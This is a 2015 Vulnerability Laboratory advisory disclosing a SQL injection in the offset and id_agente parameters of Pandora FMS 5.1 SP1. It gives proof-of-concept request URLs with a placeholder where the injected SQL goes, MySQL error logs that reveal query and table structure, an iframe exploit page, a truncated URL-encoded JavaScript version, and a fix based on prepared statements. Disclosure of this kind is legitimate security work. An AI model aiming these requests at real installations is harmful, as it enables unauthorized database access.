227 lines
No EOL
15 KiB
Text
227 lines
No EOL
15 KiB
Text
Document Title:
|
|
===============
|
|
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://vulnerability-lab.com/get_content.php?id=1355
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2015-02-09
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1355
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
6.3
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to
|
|
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement
|
|
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ
|
|
new technology market.
|
|
|
|
* Detect new systems in network.
|
|
* Checks for availability or performance.
|
|
* Raise alerts when something goes wrong.
|
|
* Allow to get data inside systems with its own lite agents (for almost every Operating System).
|
|
* Allow to get data from outside, using only network probes. Including SNMP.
|
|
|
|
|
|
* Get SNMP Traps from generic network devices.
|
|
* Generate real time reports and graphics.
|
|
* SLA reporting.
|
|
* User defined graphical views.
|
|
* Store data for months, ready to be used on reporting.
|
|
* Real time graphs for every module.
|
|
* High availability for each component.
|
|
* Scalable and modular architecture.
|
|
* Supports up to 2500 modules per server.
|
|
* User defined alerts. Also could be used to react on incidents.
|
|
* Integrated incident manager.
|
|
* Integrated DB management: purge and DB compaction.
|
|
* Multiuser, multi profile, multi group.
|
|
* Event system with user validation for operation in teams.
|
|
* Granularity of accesses and user profiles for each group and each user.
|
|
* Profiles could be personalized using up to eight security attributes without limitation on groups or profiles.
|
|
|
|
Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a
|
|
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.
|
|
|
|
(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2015-02-09: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Artica Sulociones Tecnologicas
|
|
Product: Pandora FMS - Monitoring Web Application 5.1 SP1
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A remote sql injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
|
|
The vulnerability allows remote attackers and low privileged application user accounts to unauthorized execute sql commands
|
|
that compromise the affected monitoring web-application and dbms.
|
|
|
|
The vulnerability is located in the offset value of the index list context module. Remote attackers and low privileged application
|
|
user accounts are able to execute own sql commands via GET method request. The attacker can prepare a request through the `agentes`
|
|
module to inject own sql commands on the affected web-application dbms.
|
|
|
|
The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 6.3.
|
|
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
|
|
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.
|
|
|
|
Request Method(s):
|
|
[+] GET
|
|
|
|
Vulnerable Module(s):
|
|
[+] agentes
|
|
[+] agents_modules
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] offset
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The sql injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction.
|
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
|
|
|
PoC:
|
|
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
|
|
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
|
|
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60
|
|
http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--
|
|
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--
|
|
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--
|
|
http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
|
|
|
|
|
|
--- SQL Error Session Logs ---
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
|
|
-
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
|
|
-
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
|
|
-
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
|
|
-
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74
|
|
-
|
|
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php
|
|
|
|
|
|
PoC: Exploit (html & js)
|
|
|
|
<html>
|
|
<head><body>
|
|
<title>Pandora FMS - SQL Injection Exploit</title>
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60>
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-->
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-->
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-->
|
|
<iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
|
|
</head></body>
|
|
</html>
|
|
|
|
... or
|
|
|
|
<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D
|
|
http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D
|
|
%26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
|
|
sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B
|
|
SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26
|
|
group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A
|
|
//fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20
|
|
VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
|
|
sec%3Destado%26sec2%3Doperation/agentes
|
|
|
|
|
|
Reference(s):
|
|
http://fms.localhost:8080/pandora/index.php
|
|
http://fms.localhost:8080/pandora/include/db/mysql.php
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
The issue can be patched by implementation of a prepared statement thats prevents the execution of sql commands through the weak values.
|
|
Encode and parse the vulnerable `offset` value in all the marked moduzles to prevent further executions or information disclosure.
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
The security risk of the remote sql injection vulnerabilitiy in the pandora fms application is estimated as high. (CVSS 6.3)
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
|
SERVICE: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com
|
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt |